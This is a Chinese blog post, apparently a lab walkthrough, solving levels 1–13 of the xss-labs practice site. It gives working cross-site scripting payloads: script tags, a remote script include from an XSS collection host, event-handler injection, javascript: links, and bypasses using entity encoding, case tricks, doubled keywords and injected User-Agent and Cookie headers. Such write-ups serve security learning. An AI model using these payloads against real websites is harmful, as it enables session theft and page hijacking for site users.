前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
腾讯云架构师技术同盟
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP腾讯云架构师技术同盟
返回腾讯云官网
社区首页 >专栏 >xss-labs第1~13关

xss-labs第1~13关

作者头像
宸寰客
发布2020-08-11 15:50:33
发布2020-08-11 15:50:33
1.2K00
代码可运行
举报
文章被收录于专栏:yuancao博客yuancao博客
运行总次数:0
代码可运行

伪重点

代码语言:javascript
代码运行次数:0
复制
<script>alert(1);</script>	//直接嵌入script

<script src=https://xsspt.com/MQzN0Z></script>		//从远程嵌入script

<input name=keyword value="" onmouseover="alert(1)">	//通过事件属性值传入script字符串

<a HREF=javascript:alert(1)>aaa</a>		//超链接


<a HREF=javasc&#114;ipt:alert(1)>aaa</a>	//html实体转义

第1关

把test改为<script>alert(1)</script>

直接过关。

第2关

用第一关的方法,不行了。右击鼠标看源码

发现1这个位置的<>被转码了

但是2这个位置没有,所以可以考虑把2当做输出点

先用">闭合value标签,再输出弹窗。

代码语言:javascript
代码运行次数:0
复制
"><script>alert(1)</script>

第3关

输入' '' < >,查看源码,发现两个地方,"<>都被转码

但是单引号作为闭合符没有被转码

于是想到了on事件。

代码语言:javascript
代码运行次数:0
复制
'onclick='alert(1)

'onmouseover='alert(1)'

第4关

发现2这个地方,单引号,双引号还在,且双引号是闭合符

所以和第三关一样的做法,用on函数,只是闭合符换成了"

第5关

这一关在测试’ ‘’ < >是否正常显示时,发现都可以。

用第一关的方法试一试。却发现果然没这么简单,script被隔开了

又想到了刚刚的67在文本框的外面出现,所以试试超链接行不行

代码语言:javascript
代码运行次数:0
复制
"> 12<a href="javascript:alert(1)">34</a>

成功

第6关

用前面几关的方法来试,都不行

忽然发现1全是小写,2有大写有小写,想到了大小写绕过

果然成功

代码语言:javascript
代码运行次数:0
复制
"><Script>alert(1)</script>

第7关

这一关也很简单,随便输入<script>alert(1)</script>试试水,看到script直接就没了,立马就想到了双写绕过

成功

代码语言:javascript
代码运行次数:0
复制
"><scscriptript>alert(1)</scrscriptipt>

第8关

经过尝试,发现添加友情链接后,点击友情链接,就会跳到刚刚添加的友情链接的位置

<script>alert(1)</script>试水,script被过滤了。

试试其他的方法。on事件也被过滤了,大小写也不行。看了看攻略,要用到转义字符

ASCII表得:s是115 所以用java&#115cript:alert(1)试试

成功

第9关

用第8关的方式

说链接不合法

想到链接一般都有个http://或者https://。 所以在前面加上http://,这次没有再说链接不合法,但是点击没反应。

这关有点尴尬,不加http://,链接就不合法;加了http://,语句结构就不合法。

查看万能的攻略,说应该把http://放在后面,注释掉。 因为后端只检测链接里面包含http://字段就行,注不注释掉没关系。而注释掉,语句结构就没问题了

代码语言:javascript
代码运行次数:0
复制
java&#115cript:alert(1)  //http:// 

java&#115cript:alert(1)  /*http://www.baidu.com*/

第10关

查看源码,<>被转码了,但是发现三个隐藏的input。

给他们赋值(这应该是叫赋值吧)

看源码,发现只有t_sort有反应

3换成" type="text" onmouseover="alert(1)

http://172.16.11.54/xss-labs/level10.php?keyword=4&t_sort=" type="text" onmouseover="alert(1)

当鼠标经过name="t_sort"的时候,弹出弹窗,过关。

第11关

同样查看源码,发现四个隐藏的文本框

分别赋值,还是只有t_sort有反应

代码语言:javascript
代码运行次数:0
复制
172.16.11.222/xss-labs/level11.php?keyword=good job!&t_link=1&t_history=2&t_sort=3&t_ref=4

那就用第10关的方法

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/xss-labs/level11.php?keyword=good job!&t_sort=" type="text" οnmοuseοver="alert(1)

不行,没反应,查看源码,双引号被过滤了

查看攻略说要抓包,我正想参考这个攻略打开burpsuite,按F11的时候,不小心按到了F12。

既然url里面不能操作,那能不能直接在控制台里操作,将type改成text,加入onmouseover="alert(1)"

然后点击出现的文本框,成功弹出弹窗。也不知道这算不算成功过关

第12关

用第10关的方法,同样发现只有t_sort有反应,但是t_ua这里有一串奇怪的东西

用前面的方法都不行,抓包吧。

使用burpsuite抓包的时候,发现t_uavalueuser-agent的值有点像,是不是这里输出的就是user-agent的值呢?

试一下

在user-agent的值后面加上 " type="text" onmouseover="alert(1)"

果然成功

第13关

经过前面几关的学习,看源码,抓包已经成为基本操作了

发现t_cook的值和cookie的值有点意思

于是在cookie后面加上" type="text" onmouseover="alert(1)"

果然成功

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020/08/04 ,如有侵权请联系 cloudcommunity@tencent.com 删除
http
安全

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

http
安全
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
目录
  • 伪重点
  • 第1关
  • 第2关
  • 第3关
  • 第4关
  • 第5关
  • 第6关
  • 第7关
  • 第8关
  • 第9关
  • 第10关
  • 第11关
  • 第12关
  • 第13关
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2025 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论